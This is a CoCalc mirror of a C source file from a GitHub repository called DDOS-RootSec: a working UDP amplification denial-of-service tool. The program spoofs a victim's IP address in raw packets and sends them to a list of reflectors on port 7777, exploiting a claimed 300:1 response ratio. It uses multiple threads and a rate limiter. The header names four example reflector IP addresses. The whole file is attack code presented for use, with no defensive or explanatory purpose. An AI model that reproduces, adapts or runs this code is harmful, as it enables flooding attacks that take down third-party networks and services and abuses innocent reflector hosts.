Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/DDOS Scripts/AMP Methods/Miscellaneous (not worth individual mention)/7777_unkown.c
4622 views
1
/*-------------------------------

2
Unknown application on 7777/UDP responds with 300:1 packets.

3
Examples:

4
125.168.223.176

5
71.185.25.25

6
95.31.20.140

7
180.150.85.225

8


9
Amplification PoC on the dumb template C script.

10
- Phenomite

11
-------------------------------*/

12
#include <arpa/inet.h>

13
#include <netinet/ip.h>

14
#include <netinet/udp.h>

15
#include <pthread.h>

16
#include <stdio.h>

17
#include <stdlib.h>

18
#include <string.h>

19
#include <sys/socket.h>

20
#include <time.h>

21
#include <unistd.h>

22


23
// The only shit needed to change

24
static unsigned int DPORT = 7777;

25
static const char PAYLOAD[] = "\xff";

26


27
// Phenomite template begin

28
#define MAX_PACKET_SIZE 4096

29
#define PHI 0xaaf219b9 // Not the typical magic number

30
static uint32_t Q[4096], c = 362436;

31
static unsigned int PAYLOADSIZE = sizeof(PAYLOAD) - 1;

32


33
struct list {

34
  struct sockaddr_in data;

35
  struct list *next;

36
  struct list *prev;

37
};

38
struct list *head;

39
volatile int tehport;

40
volatile int limiter;

41
volatile unsigned int pps;

42
volatile unsigned int sleeptime = 100;

43
struct thread_data {

44
  int thread_id;

45
  struct list *list_node;

46
  struct sockaddr_in sin;

47
};

48


49
void init_rand(uint32_t x) {

50
  int i;

51
  Q[0] = x;

52
  Q[1] = x + PHI;

53
  Q[2] = x + PHI + PHI;

54
  for (i = 3; i < 4096; i++) {

55
    Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;

56
  }

57
}

58


59
uint32_t rand_cmwc(void) {

60
  uint64_t t, a = 18782LL;

61
  static uint32_t i = 4095;

62
  uint32_t x, r = 0xfffffffe;

63
  i = (i + 1) & 4095;

64
  t = a * Q[i] + c;

65
  c = (t >> 32);

66
  x = t + c;

67
  if (x < c) {

68
    x++;

69
    c++;

70
  }

71
  return (Q[i] = r - x);

72
}

73


74
/* function for header checksums */

75
unsigned short csum(unsigned short *buf, int nwords) {

76
  unsigned long sum;

77
  for (sum = 0; nwords > 0; nwords--)

78
    sum += *buf++;

79
  sum = (sum >> 16) + (sum & 0xffff);

80
  sum += (sum >> 16);

81
  return (unsigned short)(~sum);

82
}

83


84
void setup_ip_header(struct iphdr *iph) {

85
  iph->ihl = 5;

86
  iph->version = 4;

87
  iph->tos = 0;

88
  iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + PAYLOADSIZE;

89
  iph->id = htonl(61337);

90
  iph->frag_off = 0;

91
  iph->ttl = MAXTTL;

92
  iph->protocol = IPPROTO_UDP;

93
  iph->check = 0;

94
  iph->saddr = inet_addr("127.0.0.1");

95
}

96
void setup_udp_header(struct udphdr *udph) {

97
  udph->source = htons(61337);

98
  udph->dest = htons(DPORT);

99
  udph->check = 0;

100
  memcpy((void *)udph + sizeof(struct udphdr), PAYLOAD, PAYLOADSIZE);

101
  udph->len = htons(sizeof(struct udphdr) + PAYLOADSIZE);

102
}

103
void *flood(void *par1) {

104
  struct thread_data *td = (struct thread_data *)par1;

105
  char datagram[MAX_PACKET_SIZE];

106
  struct iphdr *iph = (struct iphdr *)datagram;

107
  struct udphdr *udph = (/*u_int8_t*/ void *)iph + sizeof(struct iphdr);

108
  struct sockaddr_in sin = td->sin;

109
  struct list *list_node = td->list_node;

110
  int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);

111
  if (s < 0) {

112
    fprintf(stderr, "Could not open raw socket.\n");

113
    exit(-1);

114
  }

115
  init_rand(time(NULL));

116
  memset(datagram, 0, MAX_PACKET_SIZE);

117
  setup_ip_header(iph);

118
  setup_udp_header(udph);

119
  udph->source = htons(tehport);

120
  iph->saddr = sin.sin_addr.s_addr;

121
  iph->daddr = list_node->data.sin_addr.s_addr;

122
  iph->check = csum((unsigned short *)datagram, iph->tot_len >> 1);

123
  int tmp = 1;

124
  const int *val = &tmp;

125
  if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof(tmp)) < 0) {

126
    fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");

127
    exit(-1);

128
  }

129
  init_rand(time(NULL));

130
  register unsigned int i;

131
  i = 0;

132
  while (1) {

133
    list_node = list_node->next;

134
    iph->daddr = list_node->data.sin_addr.s_addr;

135
    iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);

136
    iph->check = csum((unsigned short *)datagram, iph->tot_len >> 1);

137
    sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *)&list_node->data,

138
           sizeof(list_node->data));

139
    pps++;

140
    if (i >= limiter) {

141
      i = 0;

142
      usleep(sleeptime);

143
    }

144
    i++;

145
  }

146
}

147
int main(int argc, char *argv[]) {

148
  if (argc < 6) {

149
    fprintf(stdout, "%s host port listfile threads limit[-1 for none] time\n",

150
            argv[0]);

151
    exit(-1);

152
  }

153
  srand(time(NULL));

154
  int i = 0;

155
  head = NULL;

156
  fprintf(stdout, "Loading list to buffer\n");

157
  int max_len = 512;

158
  char *buffer = (char *)malloc(max_len);

159
  buffer = memset(buffer, 0x00, max_len);

160
  tehport = atoi(argv[2]);

161
  int num_threads = atoi(argv[4]);

162
  int maxpps = atoi(argv[5]);

163
  limiter = 0;

164
  pps = 0;

165
  int multiplier = 20;

166
  FILE *list_fd = fopen(argv[3], "r");

167
  while (fgets(buffer, max_len, list_fd) != NULL) {

168
    if ((buffer[strlen(buffer) - 1] == '\n') ||

169
        (buffer[strlen(buffer) - 1] == '\r')) {

170
      buffer[strlen(buffer) - 1] = 0x00;

171
      if (head == NULL) {

172
        head = (struct list *)malloc(sizeof(struct list));

173
        bzero(&head->data, sizeof(head->data));

174
        head->data.sin_addr.s_addr = inet_addr(buffer);

175
        head->next = head;

176
        head->prev = head;

177
      } else {

178
        struct list *new_node = (struct list *)malloc(sizeof(struct list));

179
        memset(new_node, 0x00, sizeof(struct list));

180
        new_node->data.sin_addr.s_addr = inet_addr(buffer);

181
        new_node->prev = head;

182
        new_node->next = head->next;

183
        head->next = new_node;

184
      }

185
      i++;

186
    } else {

187
      continue;

188
    }

189
  }

190
  struct list *current = head->next;

191
  pthread_t thread[num_threads];

192
  struct sockaddr_in sin;

193
  sin.sin_family = AF_INET;

194
  sin.sin_addr.s_addr = inet_addr(argv[1]);

195
  struct thread_data td[num_threads];

196
  for (i = 0; i < num_threads; i++) {

197
    td[i].thread_id = i;

198
    td[i].sin = sin;

199
    td[i].list_node = current;

200
    pthread_create(&thread[i], NULL, &flood, (void *)&td[i]);

201
  }

202
  fprintf(stdout, "Yeeting\n");

203
  for (i = 0; i < (atoi(argv[6]) * multiplier); i++) {

204
    usleep((1000 / multiplier) * 1000);

205
    if ((pps * multiplier) > maxpps) {

206
      if (1 > limiter) {

207
        sleeptime += 100;

208
      } else {

209
        limiter--;

210
      }

211
    } else {

212
      limiter++;

213
      if (sleeptime > 25) {

214
        sleeptime -= 25;

215
      } else {

216
        sleeptime = 0;

217
      }

218
    }

219
    pps = 0;

220
  }

221
  return 0;

222
}

223


224